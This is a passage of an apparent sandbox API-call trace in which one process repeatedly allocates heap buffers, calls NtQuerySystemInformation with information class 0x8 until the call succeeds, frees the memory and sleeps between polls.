ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.785] Sleep (dwMilliseconds=0x110) [0235.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.794] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.801] Sleep (dwMilliseconds=0x110) [0235.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.817] Sleep (dwMilliseconds=0x110) [0235.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.829] Sleep (dwMilliseconds=0x110) [0235.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.845] Sleep (dwMilliseconds=0x110) [0235.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.862] Sleep (dwMilliseconds=0x110) [0235.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.880] Sleep (dwMilliseconds=0x110) [0235.900] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.900] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.901] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.901] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.901] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.902] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.902] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.902] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.902] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.904] Sleep (dwMilliseconds=0x110) [0235.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.928] Sleep (dwMilliseconds=0x110) [0235.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.970] Sleep (dwMilliseconds=0x110) [0235.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.991] Sleep (dwMilliseconds=0x110) [0236.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.005] Sleep (dwMilliseconds=0x110) [0236.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.017] Sleep (dwMilliseconds=0x110) [0236.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.033] Sleep (dwMilliseconds=0x110) [0236.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 